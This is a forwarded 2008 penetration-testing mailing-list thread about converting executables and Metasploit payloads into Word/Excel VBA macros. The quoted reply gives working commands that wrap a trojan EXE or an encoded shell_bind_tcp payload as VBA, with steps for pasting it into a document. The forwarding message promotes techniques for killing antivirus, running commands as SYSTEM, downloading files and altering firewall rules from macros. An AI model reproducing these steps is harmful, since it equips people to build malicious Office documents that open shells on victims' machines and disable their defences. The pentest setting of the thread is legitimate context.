Fwd: Exe2vba - Anybody still have this?

[natron at invisibledenizen.org (natron)]

In case anyone finds this type of thing helpful, here are a series of
posts showing how to use VBA to perform various actions, like kill AV,
modify the windows firewall, or download files.

Useful to Kill AV, then unpack an msf payload that might trigger
antivirus as soon as it's written to the hard drive, but before it's
able to execute.

n


---------- Forwarded message ----------
From: natron <natron at invisibledenizen.org>
Date: Sun, Nov 16, 2008 at 8:50 PM
Subject: Re: Exe2vba - Anybody still have this?
To: H D Moore <sflist at digitaloffense.net>, pen-test at securityfocus.com,
Joseph McCray <joe at learnsecurityonline.com>


I wrote up a quick series of posts on how to use VBA to do all kinds
of things, as long as the user running the Excel/Word file has the
necessary rights.  If anyone would find them useful:

Running commands or launching programs:
http://blog.invisibledenizen.org/2008/11/on-vba-in-excel-and-word-documents.html

Downloading files and saving them to disk:
http://blog.invisibledenizen.org/2008/11/vba-function-to-download-files.html

Running commands as SYSTEM:
http://blog.invisibledenizen.org/2008/11/running-commands-as-system-from-vba-in.html

Killing off any antivirus that may be running:
http://blog.invisibledenizen.org/2008/11/how-to-kill-antivirus-from-word-or.html

Modifying the Windows Firewall:
http://blog.invisibledenizen.org/2008/11/modifying-windows-firewall-rules-from.html


What I would really love to see would be a combination of the
Churrasco exploit
(http://nomoreroot.blogspot.com/2008/10/token-kidnapping-windows-2008-poc.html)
into VBA, so that even if the user is running in a limited account,
they'd be able to gain SYSTEM privileges.

-n

On Wed, Nov 12, 2008 at 1:21 PM, H D Moore <sflist at digitaloffense.net> wrote:
> Hi Joseph,
>
> I added this to Metasploit. You can use the VBA generator in a few
> different ways:
>
> 1) Convert an EXE to a VBA script (works on Word/Excel automatically):
>
> $ ruby msf3/tools/exe2vba.exe mytrojan.exe output.vba
>
> 2) Create a VBA script that runs a Metasploit payload
>
> $  ruby msf3/msfpayload windows/shell_bind_tcp LPORT=12345 V > output.vba
>
> 3) Create a VBA script that runs an encoded Metasploit payload
>
> $  ruby msf3/msfpayload windows/shell_bind_tcp LPORT=12345 R | \
>    ruby msf3/msfencode -a x86 -b '' -t vba   > output.vba
>
> To use the resulting VBA, open Word/Excel, go to Tools -> Macros -> Visual
> Basic Editor, paste in, save, and exit. Works pretty well here :-)
>
> You need the latest SVN of Metasploit 3.2 trunk:
>  $ svn co http://metasploit.com/svn/framework3/trunk/
>
> On Windows, follow this guide:
>  - http://metasploit.com/dev/trac/wiki/Metasploit/Windows/Upgrade_to_SVN
>
> -HD
>
> On Tuesday 11 November 2008, Joseph McCray wrote:
> > It used to be located at:
> > http://www.priestmaster.org/tools.html
> >
> > I've been looking all over the web and really haven't been able to find
> > this app anymore.
>
>
> ------------------------------------------------------------------------
> This list is sponsored by: Cenzic
>
> Security Trends Report from Cenzic
> Stay Ahead of the Hacker Curve!
> Get the latest Q2 2008 Trends Report now
>
> www.cenzic.com/landing/trends-report
> ------------------------------------------------------------------------